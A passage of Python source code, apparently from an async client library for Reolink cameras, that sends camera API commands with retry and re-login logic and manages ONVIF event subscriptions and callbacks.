UnexpectedDataError(f\"Host {self._host}:{self._port}: Request VOD files: no 'Status' in the response: {json_data}\")\n\n statuses = [typings.VOD_search_status(status) for status in search_result[\"Status\"]]\n if status_only:\n return statuses, []\n\n if \"File\" not in search_result:\n # When there are now recordings available in the indicated time window, \"File\" will not be in the response.\n return statuses, []\n\n return statuses, [typings.VOD_file(file, self.timezone()) for file in search_result[\"File\"]]\n\n async def send_setting(self, body: typings.reolink_json, wait_before_get: int = 0) -> None:\n command = body[0][\"cmd\"]\n _LOGGER.debug(\n 'Sending command: \"%s\" to: %s:%s with body: %s',\n command,\n self._host,\n self._port,\n body,\n )\n\n try:\n json_data = await self.send(body, {\"cmd\": command}, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Command '{command}': {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error receiving response for command '{command}'\") from err\n\n _LOGGER.debug(\"Response from cmd '%s' from %s:%s: %s\", command, self._host, self._port, json_data)\n\n try:\n if json_data[0][\"code\"] != 0 or json_data[0].get(\"value\", {}).get(\"rspCode\", -1) != 200:\n _LOGGER.debug(\"ApiError for command '%s', response: %s\", command, json_data)\n rspCode = json_data[0].get(\"value\", json_data[0][\"error\"])[\"rspCode\"]\n detail = json_data[0].get(\"value\", json_data[0][\"error\"]).get(\"detail\", \"\")\n raise ApiError(f\"cmd '{command}': API returned error code {json_data[0]['code']}, response code {rspCode}/{detail}\")\n except KeyError as err:\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: received an unexpected response from command '{command}': {json_data}\") from err\n\n if command[:3] == \"Set\":\n getcmd = command.replace(\"Set\", \"Get\")\n if wait_before_get > 0:\n await asyncio.sleep(wait_before_get)\n await self.get_state(cmd=getcmd)\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> bytes:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"text/html\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> str:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> aiohttp.ClientResponse:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"json\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> bytes:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"text/html\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> str:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> aiohttp.ClientResponse:\n ...\n\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None = None,\n expected_response_type: Literal[\"json\", \"image/jpeg\", \"text/html\", \"application/octet-stream\"] = \"json\",\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json | bytes | str | aiohttp.ClientResponse:\n \"\"\"\n If a body contains more than MAX_CHUNK_ITEMS requests, split it up in chunks.\n Otherwise you get a 'error': {'detail': 'send failed', 'rspCode': -16} response.\n \"\"\"\n len_body = len(body)\n if len_body <= MAX_CHUNK_ITEMS or expected_response_type != \"json\":\n return await self.send_chunk(body, param, expected_response_type, retry)\n\n response: typings.reolink_json = []\n for chunk in range(0, len_body, MAX_CHUNK_ITEMS):\n chunk_end = min(chunk + MAX_CHUNK_ITEMS, len_body)\n _LOGGER.debug(\"sending chunks %i:%i of total %i requests\", chunk + 1, chunk_end, len_body)\n response.extend(await self.send_chunk(body[chunk:chunk_end], param, expected_response_type, retry))\n\n return response\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\"],\n retry: int,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int,\n ) -> bytes:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"text/html\"],\n retry: int,\n ) -> str:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int,\n ) -> aiohttp.ClientResponse:\n ...\n\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\", \"image/jpeg\", \"text/html\", \"application/octet-stream\"],\n retry: int,\n ) -> typings.reolink_json | bytes | str | aiohttp.ClientResponse:\n \"\"\"Generic send method.\"\"\"\n retry = retry - 1\n\n if expected_response_type in [\"image/jpeg\", \"application/octet-stream\"]:\n cur_command = \"\" if param is None else param.get(\"cmd\", \"\")\n is_login_logout = False\n else:\n cur_command = \"\" if len(body) == 0 else body[0].get(\"cmd\", \"\")\n is_login_logout = cur_command in [\"Login\", \"Logout\"]\n\n if not is_login_logout:\n await self.login()\n\n if not param:\n param = {}\n if cur_command == \"Login\":\n param[\"token\"] = \"null\"\n elif self._token is not None:\n param[\"token\"] = self._token\n\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Request params =\\n%s\\n\", self.nvr_name, self._host, self._port, str(param).replace(self._password, \"\"))\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n try:\n data: bytes | str\n if expected_response_type == \"image/jpeg\":\n async with self._send_mutex:\n response = await self._aiohttp_session.get(url=self._url, params=param, allow_redirects=False)\n\n data = await response.read() # returns bytes\n elif expected_response_type == \"application/octet-stream\":\n async with self._send_mutex:\n dl_timeout = aiohttp.ClientTimeout(connect=self.timeout, sock_read=self.timeout)\n response = await self._aiohttp_session.get(url=self._url, params=param, allow_redirects=False, timeout=dl_timeout)\n\n data = \"\" # Response will be a file and be large, pass the response instead of reading it here.\n else:\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Request body =\\n%s\\n\", self.nvr_name, self._host, self._port, str(body).replace(self._password, \"\"))\n\n async with self._send_mutex:\n response = await self._aiohttp_session.post(url=self._url, json=body, params=param, allow_redirects=False)\n\n data = await response.text(encoding=\"utf-8\") # returns str\n\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Response status = %s, content-type = (%s).\", self.nvr_name, self._host, self._port, response.status, response.content_type)\n if cur_command == \"Search\" and len(data) > 500:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response (VOD search) data scrapped because it's too large.\", self.nvr_name, self._host, self._port)\n elif cur_command in [\"Snap\", \"Download\"]:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response (snapshot/download) data scrapped because it's too large.\", self.nvr_name, self._host, self._port)\n else:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response data:\\n%s\\n\", self.nvr_name, self._host, self._port, data)\n\n if len(data) < 500 and response.content_type == \"text/html\":\n if isinstance(data, bytes):\n login_err = b'\"detail\" : \"invalid user\"' in data or b'\"detail\" : \"login failed\"' in data or b'detail\" : \"please login first' in data\n else:\n login_err = (\n '\"detail\" : \"invalid user\"' in data or '\"detail\" : \"login failed\"' in data or 'detail\" : \"please login first' in data\n ) and cur_command != \"Logout\"\n if login_err:\n response.release()\n if is_login_logout:\n raise CredentialsInvalidError()\n\n if retry <= 0:\n raise CredentialsInvalidError()\n _LOGGER.debug(\n 'Host %s:%s: \"invalid login\" response, trying to login again and retry the command.',\n self._host,\n self._port,\n )\n await self.expire_session()\n return await self.send(body, param, expected_response_type, retry)\n\n expected_content_type: str = expected_response_type\n if expected_response_type == \"json\":\n expected_content_type = \"text/html\"\n # Reolink typo \"apolication/octet-stream\" instead of \"application/octet-stream\"\n if response.content_type not in [expected_content_type, \"apolication/octet-stream\"]:\n response.release()\n raise InvalidContentTypeError(f\"Expected type '{expected_content_type}' but received '{response.content_type}'\")\n\n if response.status == 502 and retry > 0:\n _LOGGER.debug(\"Host %s:%s: 502/Bad Gateway response, trying to login again and retry the command.\", self._host, self._port)\n response.release()\n await self.expire_session()\n return await self.send(body, param, expected_response_type, retry)\n\n if response.status >= 400 or (is_login_logout and response.status != 200):\n response.release()\n raise ApiError(f\"API returned HTTP status ERROR code {response.status}/{response.reason}\")\n\n if expected_response_type == \"json\" and isinstance(data, str):\n try:\n json_data = json_loads(data)\n except (TypeError, JSONDecodeError) as err:\n if retry <= 0:\n raise InvalidContentTypeError(\n f\"Error translating JSON response: {str(err)}, from commands {[cmd.get('cmd') for cmd in body]}, \"\n f\"content type '{response.content_type}', data:\\n{data}\\n\"\n ) from err\n _LOGGER.debug(\"Error translating JSON response: %s, trying again, data:\\n%s\\n\", str(err), data)\n await self.expire_session(unsubscribe=False)\n return await self.send(body, param, expected_response_type, retry)\n if json_data is None:\n await self.expire_session(unsubscribe=False)\n raise NoDataError(f\"Host {self._host}:{self._port}: returned no data: {data}\")\n return json_data\n\n if expected_response_type == \"image/jpeg\" and isinstance(data, bytes):\n return data\n\n if expected_response_type == \"text/html\" and isinstance(data, str):\n return data\n\n if expected_response_type == \"application/octet-stream\":\n # response needs to be read or released from the calling function\n return response\n\n response.release()\n raise InvalidContentTypeError(f\"Expected {expected_response_type}, unexpected data received: {data!r}\")\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n if retry <= 0:\n _LOGGER.debug(\"Host %s:%s: connection error: %s\", self._host, self._port, str(err))\n await self.expire_session()\n raise ReolinkConnectionError(f\"Host {self._host}:{self._port}: connection error: {str(err)}\") from err\n _LOGGER.debug(\"Host %s:%s: connection error, trying again: %s\", self._host, self._port, str(err))\n return await self.send(body, param, expected_response_type, retry)\n except asyncio.TimeoutError as err:\n if retry <= 0:\n _LOGGER.debug(\n \"Host %s:%s: connection timeout. Please check the connection to this host.\",\n self._host,\n self._port,\n )\n await self.expire_session()\n raise ReolinkTimeoutError(f\"Host {self._host}:{self._port}: Timeout error: {str(err)}\") from err\n _LOGGER.debug(\n \"Host %s:%s: connection timeout, trying again.\",\n self._host,\n self._port,\n )\n return await self.send(body, param, expected_response_type, retry)\n except RuntimeError as err:\n if self._aiohttp_session.closed and retry > 0:\n # catch RuntimeError(\"Session is closed\") from aiohttp, can happen due to async\n _LOGGER.debug(\"Host %s:%s: aiohttp session closed, retrying.\", self._host, self._port)\n return await self.send(body, param, expected_response_type, retry)\n _LOGGER.error('Host %s:%s: RuntimeError \"%s\" occurred, traceback:\\n%s\\n', self._host, self._port, str(err), traceback.format_exc())\n await self.expire_session()\n raise err\n except ApiError as err:\n _LOGGER.error(\"Host %s:%s: API error: %s.\", self._host, self._port, str(err))\n await self.expire_session(unsubscribe=False)\n raise err\n except CredentialsInvalidError as err:\n _LOGGER.error(\"Host %s:%s: login attempt failed.\", self._host, self._port)\n await self.expire_session()\n raise err\n except InvalidContentTypeError as err:\n _LOGGER.debug(\"Host %s:%s: content type error: %s.\", self._host, self._port, str(err))\n await self.expire_session(unsubscribe=False)\n raise err\n except Exception as err:\n _LOGGER.error('Host %s:%s: unknown exception \"%s\" occurred, traceback:\\n%s\\n', self._host, self._port, str(err), traceback.format_exc())\n await self.expire_session()\n raise err\n\n async def send_reolink_com(\n self,\n URL: str,\n expected_response_type: Literal[\"application/json\"] = \"application/json\",\n ) -> dict[str, Any]:\n \"\"\"Generic send method for reolink.com site.\"\"\"\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n com_timeout = aiohttp.ClientTimeout(total=2 * self.timeout)\n try:\n response = await self._aiohttp_session.get(url=URL, timeout=com_timeout)\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Connetion error to {URL}: {str(err)}\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Timeout requesting {URL}: {str(err)}\") from err\n\n if response.status != 200:\n response.release()\n raise ApiError(f\"Request to {URL} returned HTTP status ERROR code {response.status}/{response.reason}\")\n\n if response.content_type != expected_response_type:\n response.release()\n raise InvalidContentTypeError(f\"Request to {URL}, expected type '{expected_response_type}' but received '{response.content_type}'\")\n\n try:\n data = await response.text()\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Connetion error reading response from {URL}: {str(err)}\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Timeout reading response from {URL}: {str(err)}\") from err\n\n try:\n json_data = json_loads(data)\n except (TypeError, JSONDecodeError) as err:\n raise InvalidContentTypeError(f\"Error translating JSON response: {str(err)}, from {URL}, \" f\"content type '{response.content_type}', data:\\n{data}\\n\") from err\n\n if json_data is None:\n raise NoDataError(f\"Request to {URL} returned no data: {data}\")\n\n resp_code = json_data.get(\"result\", {}).get(\"code\")\n if resp_code != 0:\n raise ApiError(f\"Request to {URL} returned error code {resp_code}, data:\\n{json_data}\")\n\n return json_data\n\n ##############################################################################\n # SUBSCRIPTION managing\n def renewtimer(self, sub_type: SubType = SubType.all) -> int:\n \"\"\"Return the renew time in seconds. Negative if expired.\"\"\"\n if sub_type == SubType.all:\n t_push = self.renewtimer(SubType.push)\n t_long_poll = self.renewtimer(SubType.long_poll)\n if t_long_poll == -1:\n return t_push\n if t_push == -1:\n return t_long_poll\n return min(t_push, t_long_poll)\n\n if sub_type not in self._subscription_time_difference or sub_type not in self._subscription_termination_time:\n return -1\n\n diff = self._subscription_termination_time[sub_type] - datetime.utcnow()\n return int(diff.total_seconds())\n\n def subscribed(self, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push) -> bool:\n return sub_type in self._subscription_manager_url and self.renewtimer(sub_type) > 0\n\n def convert_time(self, time) -> Optional[datetime]:\n \"\"\"Convert time object to printable.\"\"\"\n try:\n return datetime.strptime(time, \"%Y-%m-%dT%H:%M:%SZ\")\n except ValueError:\n return None\n\n async def calc_time_difference(self, local_time, remote_time) -> float:\n \"\"\"Calculate the time difference between local and remote.\"\"\"\n return remote_time.timestamp() - local_time.timestamp()\n\n async def get_digest(self) -> dict:\n \"\"\"Get the authorisation digest.\"\"\"\n time_created = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n\n raw_nonce = uuid.uuid4().bytes\n nonce = base64.b64encode(raw_nonce)\n\n sha1 = hashlib.sha1()\n sha1.update(raw_nonce + time_created.encode(\"utf8\") + self._password.encode(\"utf8\"))\n raw_digest = sha1.digest()\n digest_pwd = base64.b64encode(raw_digest)\n\n return {\n \"UsernameToken\": str(uuid.uuid4()),\n \"Username\": self._username,\n \"PasswordDigest\": digest_pwd.decode(\"utf8\"),\n \"Nonce\": nonce.decode(\"utf8\"),\n \"Created\": time_created,\n }\n\n async def subscription_send(self, headers, data, timeout: aiohttp.ClientTimeout | None = None, mutex: asyncio.Lock | None = None) -> str:\n \"\"\"Send subscription data to the camera.\"\"\"\n if self._subscribe_url is None:\n await self.get_state(\"GetNetPort\")\n\n if self._subscribe_url is None:\n raise NotSupportedError(f\"subscription_send: failed to retrieve subscribe_url from {self._host}:{self._port}\")\n\n _LOGGER.debug(\n \"Host %s:%s: subscription request data:\\n%s\\n\",\n self._host,\n self._port,\n data,\n )\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n if timeout is None:\n timeout = self._timeout\n if mutex is None:\n mutex = self._send_mutex\n\n try:\n async with mutex:\n response = await self._aiohttp_session.post(\n url=self._subscribe_url,\n data=data,\n headers=headers,\n allow_redirects=False,\n timeout=timeout,\n )\n\n response_text = await response.text()\n _LOGGER.debug(\n \"Host %s:%s: subscription got response status: %s. Payload:\\n%s\\n\",\n self._host,\n self._port,\n response.status,\n response_text,\n )\n\n if response.status != 200:\n if response.status == 400 and \"NotAuthorized\" in response_text and self.api_version(\"onvif\") <= 1:\n raise NotSupportedError(\n f\"Host {self._host}:{self._port}: subscription request got HTTP status response \"\n f\"{response.status}: {response.reason} with 'NotAuthorized' as response text\"\n )\n raise ApiError(f\"Host {self._host}:{self._port}: subscription request got a response with wrong HTTP status {response.status}: {response.reason}\")\n\n return response_text\n\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Host {self._host}:{self._port}: connection error: {str(err)}.\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Host {self._host}:{self._port}: connection timeout exception.\") from err\n\n async def subscribe(self, webhook_url: str | None = None, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push, retry: bool = False):\n \"\"\"Subscribe to ONVIF events.\"\"\"\n headers = templates.HEADERS\n if sub_type == SubType.push:\n headers.update(templates.SUBSCRIBE_ACTION)\n template = templates.SUBSCRIBE_XML\n elif sub_type == SubType.long_poll:\n headers.update(templates.PULLPOINT_ACTION)\n template = templates.PULLPOINT_XML\n\n parameters = {\n \"InitialTerminationTime\": f\"PT{SUBSCRIPTION_TERMINATION_TIME}M\",\n }\n if webhook_url is not None and sub_type == SubType.push:\n parameters[\"Address\"] = webhook_url\n\n parameters.update(await self.get_digest())\n local_time = datetime.utcnow()\n\n xml = template.format(**parameters)\n\n try:\n response = await self.subscription_send(headers, xml)\n except NotSupportedError as err:\n raise err\n except ReolinkError as err:\n if not retry:\n _LOGGER.debug(\"Reolink %s subscribe error: %s\", sub_type, str(err))\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}: {str(err)}\") from err\n root = XML.fromstring(response)\n\n address_element = root.find(\".//{http://www.w3.org/2005/08/addressing}Address\")\n if address_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find subscription manager url\")\n sub_manager_url = address_element.text\n\n if sub_manager_url is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, subscription manager url not available\")\n self._subscription_manager_url[sub_type] = sub_manager_url\n\n current_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}CurrentTime\")\n if current_time_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find CurrentTime\")\n remote_time = self.convert_time(current_time_element.text)\n\n if remote_time is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, CurrentTime not available\")\n\n self._subscription_time_difference[sub_type] = await self.calc_time_difference(local_time, remote_time)\n\n termination_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}TerminationTime\")\n if termination_time_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find TerminationTime\")\n\n termination_time = self.convert_time(termination_time_element.text)\n if termination_time is None:\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, TerminationTime not available\")\n\n self._subscription_termination_time[sub_type] = termination_time - timedelta(seconds=self._subscription_time_difference[sub_type])\n\n _LOGGER.debug(\n \"%s, local time: %s, camera time: %s (difference: %s), termination time: %s\",\n sub_type,\n local_time.strftime(\"%Y-%m-%d %H:%M\"),\n remote_time.strftime(\"%Y-%m-%d %H:%M\"),\n self._subscription_time_difference[sub_type],\n self._subscription_termination_time[sub_type].strftime(\"%Y-%m-%d %H:%M\"),\n )\n\n return\n\n async def renew(self, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push):\n \"\"\"Renew the ONVIF event subscription.\"\"\"\n if not self.subscribed(sub_type):\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, not previously subscribed\")\n\n headers = templates.HEADERS\n headers.update(templates.RENEW_ACTION)\n template = templates.RENEW_XML\n\n parameters = {\n \"To\": self._subscription_manager_url[sub_type],\n \"TerminationTime\": f\"PT{SUBSCRIPTION_TERMINATION_TIME}M\",\n }\n\n parameters.update(await self.get_digest())\n local_time = datetime.utcnow()\n\n xml = template.format(**parameters)\n\n try:\n response = await self.subscription_send(headers, xml)\n except ReolinkError as err:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription: {str(err)}\") from err\n root = XML.fromstring(response)\n\n current_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}CurrentTime\")\n if current_time_element is None:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, could not find CurrentTime\")\n remote_time = self.convert_time(current_time_element.text)\n\n if remote_time is None:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, CurrentTime not available\")\n\n self._subscription_time_difference[sub_type] = await self.calc_time_difference(local_time, remote_time)\n\n # The Reolink renew functionality has a bug: it always returns the INITIAL TerminationTime.\n # By adding the duration to the CurrentTime parameter, the new termination time can be calculated.\n # This will not work before the Reolink bug gets fixed on all devices\n # termination_time_element = root.find('.//{http://docs.oasis-open.org/wsn/b-2}TerminationTime')\n # if termination_time_element is None:\n # await self.unsubscribe_all(sub_type)\n # raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, unexpected response\")\n # remote_termination_time = self.convert_time(termination_time_element.text)\n # if remote_termination_time is None:\n # await self.unsubscribe_all(sub_type)\n # raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, unexpected response\")\n # self._subscription_termination_time[sub_type] = remote_termination_time - timedelta(seconds = self._subscription_time_difference[sub_type])\n self._subscription_termination_time[sub_type] = local_time + timedelta(minutes=SUBSCRIPTION_TERMINATION_TIME)\n\n _LOGGER.debug(\n \"Renewed subscription successfully, local time: %s, camera time: %s (difference: %s), termination time: %s\",\n local_time.strftime(\"%Y-%m-%d %H:%M\"),\n remote_time.strftime(\"%Y-%m-%d %H:%M\"),\n self._subscription_time_difference[sub_type],\n self._subscription_termination_time[sub_type].strftime(\"%Y-%m-%d %H:%M\"),\n )\n\n return\n\n async def pull_point_request(self):\n \"\"\"Request message from ONVIF pull point.\"\"\"\n if not self.subscribed(SubType.long_poll):\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to request pull point message, not yet subscribed\")\n\n headers = templates.HEADERS\n headers.update(templates.PULLMESSAGE_ACTION)\n template = templates.PULLMESSAGE_XML\n\n parameters = {\n \"To\": self._subscription_manager_url[SubType.long_poll],\n \"Timeout\": f\"PT{LONG_POLL_TIMEOUT}M\",\n }\n parameters.update(await self.get_digest())\n\n xml = template.format(**parameters)\n _LOGGER.debug(\"Reolink %s requesting ONVIF pull point message\", self.nvr_name)\n\n timeout = aiohttp.ClientTimeout(total=LONG_POLL_TIMEOUT * 60 + 30, connect=self.timeout)\n\n try:\n response = await self.subscription_send(headers, xml, timeout, mutex=self._long_poll_mutex)\n except ReolinkError as err:\n raise SubscriptionError(f\"Failed to request pull point message: {str(err)}\") from err\n\n root = XML.fromstring(response)\n if root.find(\".//{http://docs.oasis-open.org/wsn/b-2}NotificationMessage\") is None:\n _LOGGER.debug(\"Reolink %s received ONVIF pull point message without event\", self.nvr_name)\n return []\n\n _LOGGER.info(\"Reolink %s received ONVIF pull point event\", self.nvr_name)\n\n return await self.ONVIF_event_callback(response, root)\n\n async def unsubscribe(self, sub_type: SubType = SubType.all):\n \"\"\"Unsubscribe from ONVIF events.\"\"\"\n if sub_type == SubType.all:\n await self.unsubscribe(SubType.push)\n await self.unsubscribe(SubType.long_poll)\n return\n\n if sub_type in self._subscription_manager_url:\n headers = templates.HEADERS\n headers.update(templates.UNSUBSCRIBE_ACTION)\n template = templates.UNSUBSCRIBE_XML\n\n parameters = {\"To\": self._subscription_manager_url[sub_type]}\n parameters.update(await self.get_digest())\n\n xml = template.format(**parameters)\n\n try:\n await self.subscription_send(headers, xml)\n except ReolinkError as err:\n _LOGGER.error(\"Error while unsubscribing %s: %s\", sub_type, str(err))\n\n self._subscription_manager_url.pop(sub_type, None)\n\n self._subscription_termination_time.pop(sub_type, None)\n self._subscription_time_difference.pop(sub_type, None)\n return\n\n async def unsubscribe_all(self, sub_type: SubType = SubType.all):\n \"\"\"Unsubscribe from ONVIF events. Normally only needed during entry initialization/setup, to free possibly dangling subscriptions.\"\"\"\n await self.unsubscribe(sub_type)\n\n if self._is_nvr and sub_type in [SubType.push, SubType.all]:\n _LOGGER.debug(\"Attempting to unsubscribe previous (dead) sessions notifications...\")\n\n headers = templates.HEADERS\n headers.update(templates.UNSUBSCRIBE_ACTION)\n template = templates.UNSUBSCRIBE_XML\n\n # These work for RLN8-410 NVR, so up to 3 maximum subscriptions on it\n for idx in range(0, 3):\n parameters = {\"To\": f\"http://{self._host}:{self._onvif_port}/onvif/Notification?Idx=00_{idx}\"}\n parameters.update(await self.get_digest())\n xml = template.format(**parameters)\n try:\n await self.subscription_send(headers, xml)\n except ReolinkError as err:\n _LOGGER.debug(\"Expected error from unsubscribing all: %s\", str(err))\n\n return True\n\n async def ONVIF_event_callback(self, data: str, root: XML.Element | None = None) -> list[int] | None:\n \"\"\"Handle incoming ONVIF event from the webhook called by the Reolink device.\"\"\"\n _LOGGER_DATA.debug(\"ONVIF event callback from '%s' received payload:\\n%s\", self.nvr_name, data)\n\n event_channels: list[int] = []\n contains_channels = False\n\n sub_type: Literal[SubType.push, SubType.long_poll]\n if root is None:\n sub_type = SubType.push\n root = XML.fromstring(data)\n else:\n sub_type = SubType.long_poll\n for message in root.iter(\"{http://docs.oasis-open.org/wsn/b-2}NotificationMessage\"):\n channel = None\n\n # find NotificationMessage Rule (type of event)\n topic_element = message.find(\"{http://docs.oasis-open.org/wsn/b-2}Topic[@Dialect='http://www.onvif.org/ver10/tev/topicExpression/ConcreteSet']\")\n if topic_element is None or topic_element.text is None:\n continue\n rule = basename(topic_element.text)\n if not rule:\n continue\n\n # find camera channel\n if self.num_cameras == 1:\n channel = self.channels[0]\n else:\n source_element = message.find(\".//{http://www.onvif.org/ver10/schema}SimpleItem[@Name='Source']\")\n if source_element is None:\n source_element = message.find(\".//{http://www.onvif.org/ver10/schema}SimpleItem[@Name='VideoSourceConfigurationToken']\")\n if source_element is not None and \"Value\" in source_element.attrib:\n try:\n channel = int(source_element.attrib[\"Value\"])\n except ValueError:\n if f\"ONVIF_{rule}_invalid_channel\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_invalid_channel\")\n _LOGGER.warning(\"Reolink ONVIF event '%s' data contained invalid channel '%s', issuing poll instead\", rule, source_element.attrib[\"Value\"])\n\n if channel is None:\n # Unknown which channel caused the event, poll all channels\n if f\"ONVIF_{rule}_no_channel\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_no_channel\")\n _LOGGER.warning(\"Reolink ONVIF event '%s' does not contain channel\", rule)\n if not await self.get_motion_state_all_ch():\n _LOGGER.error(\"Could not poll motion state after receiving ONVIF event with unknown channel\")\n return None\n\n if channel not in self.channels:\n # Channel has no camera connected, ignoring this notification\n contains_channels = True\n continue\n\n key = \"State\"\n if rule == \"Motion\":\n key = \"IsMotion\"\n data_element = message.find(f\".//\\u007bhttp://www.onvif.org/ver10/schema\\u007dSimpleItem[@Name='{key}']\")\n if data_element is None or \"Value\" not in data_element.attrib:\n if f\"ONVIF_{rule}_no_data\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_no_data\")\n _LOGGER.warning(\"ONVIF event '%s' did not contain data:\\n%s\", rule, data)\n continue\n\n if rule not in [\"Motion\", \"MotionAlarm\", \"FaceDetect\", \"PeopleDetect\", \"VehicleDetect\", \"DogCatDetect\", \"Visitor\"]:\n if f\"ONVIF_unknown_{rule}\" not in self._log_once:\n self._log_once.append(f\"ONVIF_unknown_{rule}\")\n _LOGGER.warning(\"ONVIF event with unknown rule: '%s'\", rule)\n continue\n\n if channel not in event_channels:\n event_channels.append(channel)\n if rule in [\"FaceDetect\", \"PeopleDetect\", \"VehicleDetect\", \"DogCatDetect\", \"Visitor\"]:\n self._onvif_only_motion[sub_type] = False\n\n state = data_element.attrib[\"Value\"] == \"true\"\n _LOGGER.info(\"Reolink %s ONVIF event channel %s, %s: %s\", self.nvr_name, channel, rule, state)\n\n if rule == \"Motion\":\n self._motion_detection_states[channel] = state\n elif rule == \"MotionAlarm\":\n self._motion_detection_states[channel] = state\n elif rule == \"FaceDetect\":\n self._ai_detection_states[channel][\"face\"] = state\n elif rule == \"PeopleDetect\":\n self._ai_detection_states[channel][\"people\"] = state\n elif rule == \"VehicleDetect\":\n 